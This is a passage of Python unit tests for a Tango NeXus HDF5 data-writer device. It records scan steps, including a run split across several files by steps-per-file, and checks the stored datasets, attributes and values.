self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "short_name")
self.assertEqual(at[...], "scan instrument")
det = ins.open("detector")
self.assertTrue(det.is_valid)
self.assertEqual(det.name, "detector")
self.assertEqual(len(det.attributes), 1)
self.assertEqual(det.size, 2)
at = det.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXdetector")
# cnt = det.open("counter") # bad exception
cnt = det.open("counter1")
self.assertTrue(cnt.is_valid)
self.assertEqual(cnt.name, "counter1")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(cnt.shape), 1)
self.assertEqual(cnt.shape, (4,))
self.assertEqual(cnt.dtype, "float64")
self.assertEqual(cnt.size, 4)
value = cnt.read()
# value = cnt[:]
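            # rows 0-1 hold the first record, rows 2-3 the second one (points reversed)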
for i in range(len(value)):
self.assertEqual(
self._counter[i if i < 2 else 3 - i], value[i])
self.assertEqual(len(cnt.attributes), 4)
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = cnt.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = cnt.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "m")
at = cnt.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
mca = det.open("mca")
self.assertTrue(mca.is_valid)
self.assertEqual(mca.name, "mca")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(mca.shape), 2)
self.assertEqual(mca.shape, (4, 2048))
self.assertEqual(mca.dtype, "float64")
self.assertEqual(mca.size, 8192)
value = mca.read()
for i in range(len(value[0])):
self.assertEqual(self._mca1[i], value[0][i])
for i in range(len(value[0])):
self.assertEqual(self._mca2[i], value[1][i])
for i in range(len(value[0])):
self.assertEqual(self._mca1[i], value[3][i])
for i in range(len(value[0])):
self.assertEqual(self._mca2[i], value[2][i])
self.assertEqual(len(mca.attributes), 4)
            at = mca.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = mca.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = mca.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "")
at = mca.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
dt = en.open("data")
self.assertTrue(dt.is_valid)
self.assertEqual(dt.name, "data")
self.assertEqual(len(dt.attributes), 1)
self.assertEqual(dt.size, 2)
at = dt.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXdata")
cnt = dt.open("counter1")
self.assertTrue(cnt.is_valid)
# ???
# self.assertEqual(cnt.name,"cnt1")
self.assertEqual(cnt.name, "counter1")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(cnt.shape), 1)
self.assertEqual(cnt.shape, (4,))
self.assertEqual(cnt.dtype, "float64")
self.assertEqual(cnt.size, 4)
# print(cnt.read())
value = cnt[:]
for i in range(len(value)):
self.assertEqual(
self._counter[i if i < 2 else 3 - i], value[i])
self.assertEqual(len(cnt.attributes), 4)
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = cnt.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = cnt.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "m")
at = cnt.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
mca = dt.open("data")
self.assertTrue(mca.is_valid)
self.assertEqual(mca.name, "data")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(mca.shape), 2)
self.assertEqual(mca.shape, (4, 2048))
self.assertEqual(mca.dtype, "float64")
self.assertEqual(mca.size, 8192)
value = mca.read()
for i in range(len(value[0])):
self.assertEqual(self._mca1[i], value[0][i])
for i in range(len(value[0])):
self.assertEqual(self._mca2[i], value[1][i])
for i in range(len(value[0])):
self.assertEqual(self._mca1[i], value[3][i])
for i in range(len(value[0])):
self.assertEqual(self._mca2[i], value[2][i])
self.assertEqual(len(mca.attributes), 4)
            at = mca.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = mca.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = mca.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "")
at = mca.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
f.close()
finally:
if os.path.isfile(fname):
os.remove(fname)
# scanRecord test
    # \brief It tests recording of a simple h5 file split into several files via stepsPerFile
def test_scanRecord_split(self):
fun = sys._getframe().f_code.co_name
print("Run: %s.%s() " % (self.__class__.__name__, fun))
tfname = '%s/%s%s.h5' % (os.getcwd(), self.__class__.__name__, fun)
fname = None
try:
dp = PyTango.DeviceProxy(self._sv.device)
self.assertTrue(ProxyHelper.wait(dp, 10000))
# print 'attributes', dp.attribute_list_query()
self.setProp(dp, "writer", "h5cpp")
dp.FileName = tfname
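            # with two steps per file the scan is split into separate numbered files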
dp.stepsPerFile = 2
self.assertEqual(dp.stepsperfile, 2)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.state(), PyTango.DevState.ON)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.OpenFile()
self.assertEqual(dp.stepsperfile, 2)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.XMLSettings = self._scanXml1
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.stepsperfile, 2)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.OpenEntry()
self.assertEqual(dp.stepsperfile, 2)
self.assertEqual(dp.currentfileid, 1)
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.Record('{"data": {"exp_c01":' + str(self._counter[0]) +
', "p09/mca/exp.02":' +
str(self._mca1) + ' } }')
self.assertEqual(dp.stepsperfile, 2)
self.assertEqual(dp.currentfileid, 1)
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.Record('{"data": {"exp_c01":' + str(self._counter[1]) +
', "p09/mca/exp.02":' +
str(self._mca2) + ' } }')
self.assertEqual(dp.stepsperfile, 2)
self.assertEqual(dp.currentfileid, 2)
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.Record('{"data": {"exp_c01":' + str(self._counter[1]) +
', "p09/mca/exp.02":' +
str(self._mca2) + ' } }')
self.assertEqual(dp.stepsperfile, 2)
self.assertEqual(dp.currentfileid, 2)
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.Record('{"data": {"exp_c01":' + str(self._counter[1]) +
', "p09/mca/exp.02":' +
str(self._mca2) + ' } }')
self.assertEqual(dp.stepsperfile, 2)
self.assertEqual(dp.currentfileid, 3)
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.Record('{"data": {"exp_c01":' + str(self._counter[1]) +
', "p09/mca/exp.02":' +
str(self._mca2) + ' } }')
self.assertEqual(dp.stepsperfile, 2)
self.assertEqual(dp.currentfileid, 3)
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.Record('{"data": {"exp_c01":' + str(self._counter[0]) +
', "p09/mca/exp.02":' +
str(self._mca1) + ' } }')
self.assertEqual(dp.stepsperfile, 2)
self.assertEqual(dp.currentfileid, 4)
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
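            # closing the entry drops currentfileid back to 1 and CloseFile resets it to 0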
dp.CloseEntry()
self.assertEqual(dp.stepsperfile, 2)
self.assertEqual(dp.currentfileid, 1)
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.CloseFile()
self.assertEqual(dp.stepsperfile, 2)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.state(), PyTango.DevState.ON)
self.assertEqual(dp.status(), self.__status[dp.state()])
            # check the first created file (steps 1-2)
fname = '%s/%s%s_00001.h5' % (
os.getcwd(), self.__class__.__name__, fun)
f = H5CppWriter.open_file(fname, readonly=True)
f = f.root()
self.assertEqual(5, len(f.attributes))
self.assertEqual(f.attributes["file_name"][...], fname)
self.assertTrue(f.attributes["NX_class"][...], "NXroot")
self.assertEqual(f.size, 2)
en = f.open("entry1")
self.assertTrue(en.is_valid)
self.assertEqual(en.name, "entry1")
self.assertEqual(len(en.attributes), 1)
self.assertEqual(en.size, 2)
at = en.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXentry")
# ins = f.open("entry1/instrument:NXinstrument") #bad exception
# ins = f.open("entry1/instrument")
ins = en.open("instrument")
self.assertTrue(ins.is_valid)
self.assertEqual(ins.name, "instrument")
self.assertEqual(len(ins.attributes), 2)
self.assertEqual(ins.size, 1)
at = ins.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXinstrument")
at = ins.attributes["short_name"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "short_name")
self.assertEqual(at[...], "scan instrument")
det = ins.open("detector")
self.assertTrue(det.is_valid)
self.assertEqual(det.name, "detector")
self.assertEqual(len(det.attributes), 1)
self.assertEqual(det.size, 2)
at = det.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXdetector")
# cnt = det.open("counter") # bad exception
cnt = det.open("counter1")
self.assertTrue(cnt.is_valid)
self.assertEqual(cnt.name, "counter1")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(cnt.shape), 1)
self.assertEqual(cnt.shape, (2,))
self.assertEqual(cnt.dtype, "float64")
self.assertEqual(cnt.size, 2)
value = cnt.read()
# value = cnt[:]
for i in range(len(value)):
self.assertEqual(self._counter[i], value[i])
self.assertEqual(len(cnt.attributes), 4)
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = cnt.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = cnt.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "m")
at = cnt.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
mca = det.open("mca")
self.assertTrue(mca.is_valid)
self.assertEqual(mca.name, "mca")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(mca.shape), 2)
self.assertEqual(mca.shape, (2, 2048))
self.assertEqual(mca.dtype, "float64")
self.assertEqual(mca.size, 4096)
value = mca.read()
for i in range(len(value[0])):
self.assertEqual(self._mca1[i], value[0][i])
for i in range(len(value[0])):
self.assertEqual(self._mca2[i], value[1][i])
self.assertEqual(len(mca.attributes), 4)
            at = mca.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = mca.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = mca.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "")
at = mca.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
dt = en.open("data")
self.assertTrue(dt.is_valid)
self.assertEqual(dt.name, "data")
self.assertEqual(len(dt.attributes), 1)
self.assertEqual(dt.size, 2)
at = dt.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXdata")
cnt = dt.open("cnt1")
self.assertTrue(cnt.is_valid)
# ???
self.assertEqual(cnt.name, "cnt1")
# self.assertEqual(cnt.name,"counter1")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(cnt.shape), 1)
self.assertEqual(cnt.shape, (2,))
self.assertEqual(cnt.dtype, "float64")
self.assertEqual(cnt.size, 2)
# print(cnt.read())
value = cnt[:]
for i in range(len(value)):
self.assertEqual(self._counter[i], value[i])
self.assertEqual(len(cnt.attributes), 4)
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = cnt.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = cnt.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "m")
at = cnt.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
mca = dt.open("data")
self.assertTrue(mca.is_valid)
self.assertEqual(mca.name, "data")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(mca.shape), 2)
self.assertEqual(mca.shape, (2, 2048))
self.assertEqual(mca.dtype, "float64")
self.assertEqual(mca.size, 4096)
value = mca.read()
for i in range(len(value[0])):
self.assertEqual(self._mca1[i], value[0][i])
for i in range(len(value[0])):
self.assertEqual(self._mca2[i], value[1][i])
self.assertEqual(len(mca.attributes), 4)
            at = mca.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = mca.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = mca.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "")
at = mca.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
f.close()
            # check the second created file (steps 3-4)
fname = '%s/%s%s_00002.h5' % (
os.getcwd(), self.__class__.__name__, fun)
f = H5CppWriter.open_file(fname, readonly=True)
f = f.root()
self.assertEqual(5, len(f.attributes))
self.assertEqual(f.attributes["file_name"][...], fname)
self.assertTrue(f.attributes["NX_class"][...], "NXroot")
self.assertEqual(f.size, 2)
en = f.open("entry1")
self.assertTrue(en.is_valid)
self.assertEqual(en.name, "entry1")
self.assertEqual(len(en.attributes), 1)
self.assertEqual(en.size, 2)
at = en.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXentry")
# ins = f.open("entry1/instrument:NXinstrument") #bad exception
# ins = f.open("entry1/instrument")
ins = en.open("instrument")
self.assertTrue(ins.is_valid)
self.assertEqual(ins.name, "instrument")
self.assertEqual(len(ins.attributes), 2)
self.assertEqual(ins.size, 1)
at = ins.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXinstrument")
at = ins.attributes["short_name"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "short_name")
self.assertEqual(at[...], "scan instrument")
det = ins.open("detector")
self.assertTrue(det.is_valid)
self.assertEqual(det.name, "detector")
self.assertEqual(len(det.attributes), 1)
self.assertEqual(det.size, 2)
at = det.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXdetector")
# cnt = det.open("counter") # bad exception
cnt = det.open("counter1")
self.assertTrue(cnt.is_valid)
self.assertEqual(cnt.name, "counter1")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(cnt.shape), 1)
self.assertEqual(cnt.shape, (2,))
self.assertEqual(cnt.dtype, "float64")
self.assertEqual(cnt.size, 2)
value = cnt.read()
# value = cnt[:]
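            # steps 3 and 4 both wrote the second counter value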
for i in range(len(value)):
self.assertEqual(self._counter[1], value[i])
self.assertEqual(len(cnt.attributes), 4)
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = cnt.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = cnt.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "m")
at = cnt.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
mca = det.open("mca")
self.assertTrue(mca.is_valid)
self.assertEqual(mca.name, "mca")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(mca.shape), 2)
self.assertEqual(mca.shape, (2, 2048))
self.assertEqual(mca.dtype, "float64")
self.assertEqual(mca.size, 4096)
value = mca.read()
for i in range(len(value[0])):
self.assertEqual(self._mca2[i], value[0][i])
for i in range(len(value[0])):
self.assertEqual(self._mca2[i], value[1][i])
self.assertEqual(len(mca.attributes), 4)
            at = mca.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = mca.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = mca.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "")
at = mca.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
dt = en.open("data")
self.assertTrue(dt.is_valid)
self.assertEqual(dt.name, "data")
self.assertEqual(len(dt.attributes), 1)
self.assertEqual(dt.size, 2)
at = dt.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXdata")
cnt = dt.open("cnt1")
self.assertTrue(cnt.is_valid)
# ???
self.assertEqual(cnt.name, "cnt1")
# self.assertEqual(cnt.name,"counter1")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(cnt.shape), 1)
self.assertEqual(cnt.shape, (2,))
self.assertEqual(cnt.dtype, "float64")
self.assertEqual(cnt.size, 2)
# print(cnt.read())
value = cnt[:]
for i in range(len(value)):
self.assertEqual(self._counter[1], value[i])
self.assertEqual(len(cnt.attributes), 4)
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = cnt.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = cnt.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "m")
at = cnt.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
mca = dt.open("data")
self.assertTrue(mca.is_valid)
self.assertEqual(mca.name, "data")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(mca.shape), 2)
self.assertEqual(mca.shape, (2, 2048))
self.assertEqual(mca.dtype, "float64")
self.assertEqual(mca.size, 4096)
value = mca.read()
for i in range(len(value[0])):
self.assertEqual(self._mca2[i], value[0][i])
for i in range(len(value[0])):
self.assertEqual(self._mca2[i], value[1][i])
self.assertEqual(len(mca.attributes), 4)
            at = mca.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = mca.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = mca.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
